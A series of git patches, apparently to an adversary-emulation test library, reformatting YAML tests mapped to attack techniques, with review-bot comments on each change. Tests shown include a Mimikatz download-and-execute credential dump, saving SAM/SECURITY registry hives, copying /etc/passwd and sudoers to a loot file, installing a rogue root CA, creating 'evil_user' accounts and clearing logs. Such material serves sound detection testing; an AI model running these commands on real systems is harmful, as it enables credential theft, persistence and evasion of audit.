From 9be4935b490cec2719c08a659dc385a70264992f Mon Sep 17 00:00:00 2001 From: Mo Amiri Date: Mon, 14 May 2018 14:19:29 +0100 Subject: [PATCH 1/5] changing args to input_arguments as per example --- atomics/t1087/t1087.yaml | 16 ++++++++-------- atomics/t1130/t1130.yaml | 8 ++++---- atomics/t1136/t1136.yaml | 16 ++++++++-------- 3 files changed, 20 insertions(+), 20 deletions(-) diff --git a/atomics/t1087/t1087.yaml b/atomics/t1087/t1087.yaml index d063354a..b39ce7ee 100644 --- a/atomics/t1087/t1087.yaml +++ b/atomics/t1087/t1087.yaml @@ -1,7 +1,7 @@ --- attack_technique: t1087 display_name: Account Discovery - + atomic_tests: - name: List all accounts description: | @@ -14,7 +14,7 @@ atomic_tests: description: Path where captured results will be placed type: Path default: ~/loot.txt - executor: + executor: name: sh command: | cat /etc/passwd > #{output_file} @@ -30,7 +30,7 @@ atomic_tests: description: Path where captured results will be placed type: Path default: ~/loot.txt - executor: + executor: name: sh command: | cat /etc/sudoers > #{output_file} @@ -46,7 +46,7 @@ atomic_tests: description: Path where captured results will be placed type: Path default: ~/loot.txt - executor: + executor: name: sh command: | grep 'x:0:' /etc/passwd > #{output_file} @@ -57,7 +57,7 @@ atomic_tests: supported_platforms: - linux - macos - executor: + executor: name: sh command: | username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username @@ -67,13 +67,13 @@ atomic_tests: xxx supported_platforms: - linux - - macos - args: + - macos + input_arguments: output_file: description: Path where captured results will be placed type: Path default: ~/loot.txt - executor: + executor: name: sh command: | lastlog > #{output_file} diff --git a/atomics/t1130/t1130.yaml b/atomics/t1130/t1130.yaml index deb6f7a5..dd7feeb6 100644 --- a/atomics/t1130/t1130.yaml +++ b/atomics/t1130/t1130.yaml 
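Review bot: `username=$(echo $HOME | awk -F'/' '{print $3}') && lsof -u $username` in the t1087 `@@ -57,7 +57,7 @@` hunk derives the account name from the home path, which yields an empty string for a Linux root shell (`/root` has no third `/`-separated field) and so runs `lsof -u ""` instead of the intended user; the hunk itself only strips trailing whitespace from `executor:` but this is the line under review. `id -un` gives the effective user on both listed platforms without depending on the home-directory layout: `lsof -u "$(id -un)"`. This test also still carries no real `description`, so whatever the generated docs print for it will be a placeholder.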
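Review bot: The test whose `args:` key becomes `input_arguments:` in the t1087 `@@ -67,13 +67,13 @@` hunk lists both `- linux` and `- macos` under `supported_platforms`, but its executor runs `lastlog > #{output_file}`, and `lastlog` is a shadow-utils command that macOS does not ship, so the macOS entry advertises a test that cannot run there. Either drop `- macos` from this test or split the platforms and use `last > #{output_file}` for macOS. The `description: | xxx` placeholder should also be replaced with one sentence such as `Capture the most recent login of every local account with lastlog` so the rendered documentation says what the test does.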
@@ -1,14 +1,14 @@ --- attack_technique: t1130 display_name: Install Root Certificate - + atomic_tests: - name: Install root CA on CentOS/RHEL description: | Creates a root CA with openssl supported_platforms: - linux - args: + input_arguments: key_filename: description: Key we create that is used to create the CA certificate type: Path @@ -17,7 +17,7 @@ atomic_tests: description: Path of the CA certificate we create type: Path default: rootCA.crt - executor: + executor: name: sh command: | openssl genrsa -out #{key_filename} 4096 @@ -37,4 +37,4 @@ atomic_tests: # To test the new trust, apply the root certificate or another signed with it to # a SSL/TLS web service and attempt a connection with curl or wget. # -# curl https://art.evil.com \ No newline at end of file +# curl https://art.evil.com diff --git a/atomics/t1136/t1136.yaml b/atomics/t1136/t1136.yaml index 0679a59b..42bd191b 100644 --- a/atomics/t1136/t1136.yaml +++ b/atomics/t1136/t1136.yaml @@ -1,7 +1,7 @@ --- attack_technique: t1136 display_name: Create Account - + atomic_tests: - name: Create a user account on a Linux system description: | @@ -9,15 +9,15 @@ atomic_tests: supported_platforms: - linux input_arguments: - username: + username: description: Username of the user to create type: String default: evil_user - comment: + comment: description: Comment to record when creating the user type: String default: Evil Account - executor: + executor: name: bash command: | useradd -M -N -r -s /bin/bash -c "#{comment}" #{username} @@ -27,16 +27,16 @@ atomic_tests: Creates a user on a MacOS system with dscl supported_platforms: - macos - args: - username: + input_arguments: + username: description: Username of the user to create type: String default: evil_user - realname: + realname: description: "'realname' to record when creating the user" type: String default: Evil Account - executor: + executor: name: bash command: | dscl . -create /Users/#{username} 
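Review bot: The t1130 test now declares `key_filename` and the certificate path as inputs, and the following hunk generates the CA key with `openssl genrsa -out #{key_filename} 4096`, yet nothing visible in the file removes that key or untrusts the certificate afterwards, so a host that runs this atomic is left trusting a CA whose private key sits in the working directory. The trailing comment even suggests verifying trust with `curl https://art.evil.com`, which only works if the rogue anchor stays installed. Until a cleanup mechanism exists, the description should carry the caveat, e.g. `description: | Creates a root CA with openssl and installs it as a system trust anchor. After the test, remove the certificate from the trust store and delete #{key_filename}.`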
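Review bot: `dscl . -create /Users/#{username}` in the macOS t1136 hunk interpolates the `username` input unquoted into a bash command, so an operator-supplied value with whitespace or shell metacharacters changes the command line rather than the account path; the Linux variant above quotes `-c "#{comment}"` but likewise leaves `#{username}` bare. Quoting keeps each substitution to one argument: `dscl . -create "/Users/#{username}"` and, in the Linux test, `useradd -M -N -r -s /bin/bash -c "#{comment}" "#{username}"`. The macOS executor body continues past the end of this hunk, so any further `#{username}` references there need the same quoting.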
From f8230f11bb711415d1506e2586c592781fce67c6 Mon Sep 17 00:00:00 2001 From: Mo Amiri Date: Sun, 27 May 2018 15:06:09 +0100 Subject: [PATCH 2/5] Changing keywords to match the rest of the atomic test files. Also formating of the files such as --- and capitalising some of the attack_technique values --- atomics/T1002/T1002.yaml | 4 +--- atomics/T1003/T1003.yaml | 15 +++++++-------- atomics/T1085/T1085.yaml | 1 + atomics/T1087/T1087.yaml | 2 +- atomics/T1105/T1105.yaml | 6 +++--- atomics/T1117/T1117.yaml | 1 + atomics/T1118/T1118.yaml | 1 + atomics/T1121/T1121.yaml | 1 + atomics/T1127/T1127.yaml | 1 + atomics/T1130/T1130.yaml | 2 +- atomics/T1136/T1136.yaml | 2 +- atomics/T1139/T1139.yaml | 6 +++--- atomics/T1148/T1148.yaml | 2 +- atomics/T1170/T1170.yaml | 1 + atomics/T1179/T1179.yaml | 1 + 15 files changed, 25 insertions(+), 21 deletions(-) diff --git a/atomics/T1002/T1002.yaml b/atomics/T1002/T1002.yaml index 93950e31..35167ada 100644 --- a/atomics/T1002/T1002.yaml +++ b/atomics/T1002/T1002.yaml @@ -27,7 +27,7 @@ atomic_tests: TODO supported_platforms: - windows - input_argument: + input_arguments: input_file: description: Path that should be compressed into our output file type: Path @@ -44,11 +44,9 @@ atomic_tests: - name: Data Compressed - nix description: | TODO - supported_platforms: - linux - macos - executor: name: sh command: | diff --git a/atomics/T1003/T1003.yaml b/atomics/T1003/T1003.yaml index 2226eac7..a833cda1 100644 --- a/atomics/T1003/T1003.yaml +++ b/atomics/T1003/T1003.yaml @@ -13,7 +13,7 @@ atomic_tests: description: URL to a remote Mimikatz script that dumps credentials type: Url default: https://raw.githubusercontent.com/mattifestation/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1 - executor: + executor: name: powershell command: | IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds 
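Review bot: The T1003 `remote_script` default points at `.../PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1` and the executor runs it via `IEX (New-Object Net.WebClient).DownloadString('#{remote_script}')`, so whatever that branch head contains at run time executes with the operator's privileges and no integrity check; the hunk only trims whitespace on `executor:`, but this default is on the new side. Pin the URL to a specific commit (`.../PowerSploit/<commit-sha>/Exfiltration/Invoke-Mimikatz.ps1`) and record the expected script hash in the description, or state explicitly there that the test pulls unpinned third-party code from the network.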
@@ -23,7 +23,7 @@ atomic_tests: https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5 supported_platforms: - windows - executor: + executor: name: command_prompt command: | gsecdump -a @@ -33,26 +33,25 @@ atomic_tests: http://www.ampliasecurity.com/research/windows-credentials-editor/ supported_platforms: - windows - input_argument: + input_arguments: output_file: description: Path where resulting data should be placed type: Path default: output.txt - executor: + executor: name: command_prompt command: | wce -o #{output_file} - name: Registry dump of SAM, creds, and secrets description: | - Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated + Local SAM (SAM & System), cached credentials (System & Security) and LSA secrets (System & Security) can be enumerated via three registry keys. Then processed locally using https://github.com/Neohapsis/creddump7 supported_platforms: - windows - executor: + executor: name: command_prompt command: | - reg save HKLM\sam sam + reg save HKLM\sam sam reg save HKLM\system system reg save HKLM\security security - diff --git a/atomics/T1085/T1085.yaml b/atomics/T1085/T1085.yaml index b7546064..d6a37515 100644 --- a/atomics/T1085/T1085.yaml +++ b/atomics/T1085/T1085.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1085 display_name: Rundll32 atomic_tests: diff --git a/atomics/T1087/T1087.yaml b/atomics/T1087/T1087.yaml index 747f138c..95b599c3 100644 --- a/atomics/T1087/T1087.yaml +++ b/atomics/T1087/T1087.yaml @@ -68,7 +68,7 @@ atomic_tests: supported_platforms: - linux - macos - args: + input_arguments: output_file: description: Path where captured results will be placed type: Path diff --git a/atomics/T1105/T1105.yaml b/atomics/T1105/T1105.yaml index 7f089be6..c4b29d73 100644 --- a/atomics/T1105/T1105.yaml +++ b/atomics/T1105/T1105.yaml 
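Review bot: The registry-dump test in the T1003 `@@ -33,26 +33,25 @@` hunk writes `sam`, `system` and `security` hive copies into the current directory with `reg save`, and nothing in the test removes them; those files hold local password hashes, cached domain credentials and LSA secrets, so the atomic leaves credential material readable by anyone who later uses that directory. No test on this page shows a cleanup key, so at minimum add to the description: `Leaves sam/system/security hive copies in the working directory; delete them once processed with creddump7.` The same applies to `wce -o #{output_file}` in the hunk above it, whose default `output.txt` is also left behind.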
@@ -1,7 +1,7 @@ --- -attack_technique: t1105 +attack_technique: T1105 display_name: Remote File Copy - + atomic_tests: - name: xxxx description: | @@ -9,7 +9,7 @@ atomic_tests: supported_platforms: - linux - macos - executor: + executor: name: bash command: | ### TODO: Not sure how to handle commands that need to be run on multiple systems diff --git a/atomics/T1117/T1117.yaml b/atomics/T1117/T1117.yaml index 7a216646..b801b26c 100644 --- a/atomics/T1117/T1117.yaml +++ b/atomics/T1117/T1117.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1117 display_name: Regsvr32 atomic_tests: diff --git a/atomics/T1118/T1118.yaml b/atomics/T1118/T1118.yaml index 7b52837b..7f9c9f89 100644 --- a/atomics/T1118/T1118.yaml +++ b/atomics/T1118/T1118.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1118 display_name: InstallUtil diff --git a/atomics/T1121/T1121.yaml b/atomics/T1121/T1121.yaml index 304149a9..d510af56 100644 --- a/atomics/T1121/T1121.yaml +++ b/atomics/T1121/T1121.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1121 display_name: RegSvcs/RegAsm diff --git a/atomics/T1127/T1127.yaml b/atomics/T1127/T1127.yaml index 287d94b1..a66b9942 100644 --- a/atomics/T1127/T1127.yaml +++ b/atomics/T1127/T1127.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1127 display_name: Trusted Developer Utilities atomic_tests: diff --git a/atomics/T1130/T1130.yaml b/atomics/T1130/T1130.yaml index dd7feeb6..ffb45f99 100644 --- a/atomics/T1130/T1130.yaml +++ b/atomics/T1130/T1130.yaml @@ -1,5 +1,5 @@ --- -attack_technique: t1130 +attack_technique: T1130 display_name: Install Root Certificate atomic_tests: diff --git a/atomics/T1136/T1136.yaml b/atomics/T1136/T1136.yaml index 42bd191b..09da49e7 100644 --- a/atomics/T1136/T1136.yaml +++ b/atomics/T1136/T1136.yaml @@ -1,5 +1,5 @@ --- -attack_technique: t1136 +attack_technique: T1136 display_name: Create Account atomic_tests: diff --git a/atomics/T1139/T1139.yaml b/atomics/T1139/T1139.yaml index 41ce03b0..9f1685e8 100644 --- a/atomics/T1139/T1139.yaml 
+++ b/atomics/T1139/T1139.yaml @@ -1,7 +1,7 @@ --- -attack_technique: t1139 +attack_technique: T1139 display_name: Bash History - + atomic_tests: - name: xxxx description: | @@ -10,7 +10,7 @@ atomic_tests: - linux - macos input_arguments: - bash_history_filename: + bash_history_filename: description: Path of the bash history file to capture type: Path default: ~/.bash_history diff --git a/atomics/T1148/T1148.yaml b/atomics/T1148/T1148.yaml index f69f79d0..d95d2623 100644 --- a/atomics/T1148/T1148.yaml +++ b/atomics/T1148/T1148.yaml @@ -1,5 +1,5 @@ --- -attack_technique: t1146 +attack_technique: T1146 display_name: HISTCONTROL atomic_tests: diff --git a/atomics/T1170/T1170.yaml b/atomics/T1170/T1170.yaml index 8cc1478f..47916540 100644 --- a/atomics/T1170/T1170.yaml +++ b/atomics/T1170/T1170.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1170 display_name: Mshta diff --git a/atomics/T1179/T1179.yaml b/atomics/T1179/T1179.yaml index 556c0c92..b5e77bb3 100644 --- a/atomics/T1179/T1179.yaml +++ b/atomics/T1179/T1179.yaml @@ -1,3 +1,4 @@ +--- attack_technique: T1179 display_name: Hooking From 070378925198bc980e484e8712cdb19b1fca8608 Mon Sep 17 00:00:00 2001 From: Mo Amiri Date: Sun, 27 May 2018 15:42:23 +0100 Subject: [PATCH 3/5] formatting --- atomics/T1007/T1007.yaml | 2 +- atomics/T1028/T1028.yaml | 2 +- atomics/T1033/T1033.yaml | 2 +- atomics/T1053/T1053.yaml | 4 ++-- atomics/T1124/T1124.yaml | 2 +- 5 files changed, 6 insertions(+), 6 deletions(-) diff --git a/atomics/T1007/T1007.yaml b/atomics/T1007/T1007.yaml index 14219028..ace23084 100644 --- a/atomics/T1007/T1007.yaml +++ b/atomics/T1007/T1007.yaml @@ -11,7 +11,7 @@ atomic_tests: - windows input_arguments: - servicename: + service_name: description: Name of service to start stop, query type: string default: svchost.exe diff --git a/atomics/T1028/T1028.yaml b/atomics/T1028/T1028.yaml index 883ae0d4..6342ac94 100644 --- a/atomics/T1028/T1028.yaml +++ b/atomics/T1028/T1028.yaml 
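Review bot: `atomics/T1148/T1148.yaml` still reads `attack_technique: T1146` after this hunk; the commit only capitalises the value, but T1146 is the ATT&CK ID for Clear Command History, whereas HISTCONTROL — the `display_name` on the next line and the directory name — is T1148. Any tooling that indexes coverage or generates documentation from `attack_technique` will file this test under the wrong technique. Change the line to `attack_technique: T1148`.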
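Review bot: Renaming `servicename` to `service_name` in T1007 changes the placeholder the executor must use to `#{service_name}`, but the command block lies outside this hunk, so confirm it was updated; otherwise the old `#{servicename}` token is left unsubstituted in the command line. The default `svchost.exe` also looks like a process image rather than a service name, so a `sc`/`net`-style query against it would presumably fail — hedged, since the command is not shown. `type: string` is lowercase here while T1053 in the same patch uses `String`; the repo should settle on one spelling so schema validation behaves consistently.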
@@ -27,7 +27,7 @@ atomic_tests: - windows input_arguments: - computername: + computer_name: description: Name of Computer type: string default: computer1 diff --git a/atomics/T1033/T1033.yaml b/atomics/T1033/T1033.yaml index 438a4281..639eb0a8 100644 --- a/atomics/T1033/T1033.yaml +++ b/atomics/T1033/T1033.yaml @@ -10,7 +10,7 @@ atomic_tests: - windows input_arguments: - computername: + computer_name: description: Name of remote computer type: strong default: computer1 diff --git a/atomics/T1053/T1053.yaml b/atomics/T1053/T1053.yaml index 9ca0a045..9484ef5a 100644 --- a/atomics/T1053/T1053.yaml +++ b/atomics/T1053/T1053.yaml @@ -54,11 +54,11 @@ atomic_tests: description: Target type: String default: localhost - UserName: + user_name: description: Username DOMAIN\User type: String default: DOMAIN\user - Password: + password: description: Password type: String default: At0micStrong diff --git a/atomics/T1124/T1124.yaml b/atomics/T1124/T1124.yaml index 0af7b43f..95c5e025 100644 --- a/atomics/T1124/T1124.yaml +++ b/atomics/T1124/T1124.yaml @@ -11,7 +11,7 @@ atomic_tests: - windows input_arguments: - computername: + computer_name: description: computer name to query type: string default: computer1 From d83d060c0d04a73448bcd19dddd7893c74aa5d00 Mon Sep 17 00:00:00 2001 From: Mo Amiri Date: Wed, 30 May 2018 09:51:49 +0100 Subject: [PATCH 4/5] Spelling mistake on password --- atomics/T1048/T1048.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1048/T1048.yaml b/atomics/T1048/T1048.yaml index d7c6aa09..8ab2033c 100644 --- a/atomics/T1048/T1048.yaml +++ b/atomics/T1048/T1048.yaml @@ -24,7 +24,7 @@ atomic_tests: description: username for domain type: string default: atomic - passowrd: + password: description: password for user type: string default: atomic From df6ed4a300a16352bdfaf85b445e560a76d60e05 Mon Sep 17 00:00:00 2001 
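Review bot: `type: strong` on the line after the renamed `computer_name` key in T1033 is a typo for `type: string`; it is a context line the commit keeps, and a validator that checks argument types will reject or ignore this input. Fix it to `type: string`, and confirm the executor (outside this hunk) now references `#{computer_name}` rather than the old `#{computername}`, since a stale placeholder is substituted as literal text rather than failing loudly.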
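Review bot: Renaming `UserName`/`Password` to `user_name`/`password` in T1053 only works if the executor, which is outside this hunk, now uses `#{user_name}` and `#{password}`; with this framework an unmatched placeholder is left verbatim in the command, so the test would try to authenticate with the literal string. The `password` default `At0micStrong` is a plaintext credential committed to the repository — acceptable only as an obvious placeholder, so the description should say it, e.g. `description: Password for the account; the default is a placeholder and must be overridden`.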
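Review bot: Correcting `passowrd` to `password` in T1048 changes the placeholder name the executor must reference, and the command block is outside this hunk: if it was written against the misspelled key (`#{passowrd}`) this rename breaks the substitution, and if it already says `#{password}` the test was broken until now. Either way, verify the command line and keep the two in sync, ideally with a check in CI that every `#{...}` token in a command has a matching `input_arguments` key.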
From: Mo Amiri Date: Thu, 31 May 2018 00:52:47 +0100 Subject: [PATCH 5/5] Formatting --- .DS_Store | Bin 0 -> 8196 bytes atomics/T1050/T1050.yaml | 2 -- atomics/T1070/T1070.yaml | 9 --------- atomics/T1098/T1098.yaml | 4 ---- atomics/T1173/T1173.yaml | 1 - atomics/T1197/T1197.yaml | 2 -- 6 files changed, 18 deletions(-) create mode 100644 .DS_Store diff --git a/.DS_Store b/.DS_Store new file mode 100644 index 0000000000000000000000000000000000000000..b44f269c7f97bd0f8f00bf00ddc8e3a3fa76bf85 GIT binary patch literal 8196 zcmeHM-EPw`82#LCG~GZe(xmM&H%MHJshbcLLP(|Cgevi;Wv~lCUD9S-v^1I8lnzQ! zZ+Hjb4R{o;xa2{2063p*rX<~vxIs+Vl6@TeJC1$)Ij&tI5{*G;jcA#OEJVi2Jd!g4 z*K?c-1zmC#D8MJ$CzslkP`?>YS(^f*fKk9GU=%P47zO?X1+Zsxu+G`{Rjo;l0!D%V zQUU%x*ocgEjT43P(}6@D0e~|omH~O310=`RSl2jFD5+>uogRdy3Vp;7ijI1l&4G1| z6NQRSLeWX+Hw%425%TTe+0vXuU7<;h0!D#p1^Db!BOnRmVay|p*&AM0^`@s7iwpH!>gM4>n{d#PkubJpCIxtGpiJaiH_8T1=& z?>Rp`ag#$&=Xc^bJk7h_v%nv=DvKL&l(<3U_ar&!_%L~~8$_LW*oX&Fr!U)aRE1@g zt#YffJQ}Unsw?(-wK`t0N4IaTt=P9}weh%YEnQo?+uZBEelvPIe)kbWLJ;~(NDJ!u zH2s8JPLx+pFAC%6fN6+D@-T5xPO9&yNl$WxHs~=uf@5q`lN$6Cxuz^}Fu`5wWcdX* z$6v(MpYZh408<&jT_U*1KBkvl#HS%jdUV8>Md>Lke9g5}qWiG!f*DXqe%4yL=7*GP zUd~#hry<_crlTB>-6+kQrw16_25n))4$@Wh`Gk@zOS*2FH47G$#0XDvmh5vxg|6AwZ|6iaHnXVcIi~@hEfSB2IHXC5c zUHuF;@A5X{9wG;}n<$hNB$*!qcs~8Z5P2J>%&BXfC`1W@xd@Oln8YaXR~7gPIk+Yw literal 0 HcmV?d00001 diff --git a/atomics/T1050/T1050.yaml b/atomics/T1050/T1050.yaml index 38434dfd..36cd2050 100644 --- a/atomics/T1050/T1050.yaml +++ b/atomics/T1050/T1050.yaml @@ -20,8 +20,6 @@ atomic_tests: supported_platforms: - windows - input_arguments: - executor: name: powershell command: | diff --git a/atomics/T1070/T1070.yaml b/atomics/T1070/T1070.yaml index 1c5e738e..c9319649 100644 --- a/atomics/T1070/T1070.yaml +++ b/atomics/T1070/T1070.yaml @@ -6,7 +6,6 @@ atomic_tests: - name: Clear Logs description: | Clear Windows Event Logs - supported_platforms: - windows input_arguments: 
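Review bot: This patch adds `.DS_Store` (8196 bytes of macOS Finder metadata) at the repository root; it carries nothing the project needs and will churn on every macOS contributor's checkout. Drop it from the commit (`git rm --cached .DS_Store`) and add a `.DS_Store` entry to `.gitignore` so it is not re-added.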
@@ -14,33 +13,25 @@ atomic_tests: description: Windows Log Name, ex System type: String default: System - executor: name: command_prompt command: | evtutil cl #{log_name} - - name: FSUtil description: | Manages the update sequence number (USN) change journal, which provides a persistent log of all changes made to files on the volume. - supported_platforms: - windows - input_arguments: - executor: name: command_prompt command: | fsutil usn deletejournal /D C: - - name: rm -rf description: | Delete system and audit logs - supported_platforms: - macos - linux - executor: name: sh command: | diff --git a/atomics/T1098/T1098.yaml b/atomics/T1098/T1098.yaml index 43baa340..05886865 100644 --- a/atomics/T1098/T1098.yaml +++ b/atomics/T1098/T1098.yaml @@ -6,12 +6,8 @@ atomic_tests: - name: Admin Account Manipulate description: | Manipulate Admin Account Name - supported_platforms: - windows - - input_arguments: - executor: name: powershell command: | diff --git a/atomics/T1173/T1173.yaml b/atomics/T1173/T1173.yaml index 6a38bc08..55b6d044 100644 --- a/atomics/T1173/T1173.yaml +++ b/atomics/T1173/T1173.yaml @@ -12,7 +12,6 @@ atomic_tests: executor: name: manual - command: | steps: | Open Microsoft Word diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml index 8ef540f0..53753e6d 100644 --- a/atomics/T1197/T1197.yaml +++ b/atomics/T1197/T1197.yaml @@ -10,7 +10,6 @@ atomic_tests: supported_platforms: - windows - input_arguments: executor: name: command_prompt command: | @@ -21,7 +20,6 @@ atomic_tests: and execute a payload leveraging PowerShell supported_platforms: - windows - input_arguments: executor: name: powershell command: |
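Review bot: `evtutil cl #{log_name}` in the T1070 Clear Logs executor is not a Windows command — the event-log utility is `wevtutil` — so the test fails with a "not recognized" error instead of exercising log clearing; the hunk only drops blank lines around it, but the line stays on the new side. Change it to `wevtutil cl #{log_name}`. The `rm -rf` test's `command: |` body starts after the end of this hunk, so the paths it deletes are not visible here; given the description "Delete system and audit logs", that body deserves its own look.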